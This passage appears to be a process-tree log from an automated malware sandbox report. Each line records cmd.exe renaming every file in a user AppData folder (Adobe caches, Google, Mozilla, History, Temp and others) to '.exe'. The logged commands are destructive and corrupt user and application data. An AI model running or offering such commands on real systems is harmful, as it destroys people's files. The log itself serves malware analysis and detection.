          • cmd.exe (PID: 1372 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1520 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7212 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5744 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7300 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4140 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5328 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 2448 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7664 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7320 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4028 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6624 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 356 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4476 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5484 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1164 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4444 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7164 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1784 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1220 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3380 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6156 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4228 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1716 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1200 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 2296 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 828 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6696 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7000 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3964 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4564 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7428 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3848 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3144 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7140 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7888 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1628 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1128 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 8168 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3332 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7340 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2520 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5808 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5952 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1368 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4220 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7632 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7504 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4996 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5380 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4028 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7688 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4324 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7232 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2884 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2620 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5432 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4444 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7040 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7952 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 8024 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2684 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6820 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5516 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7668 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4208 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
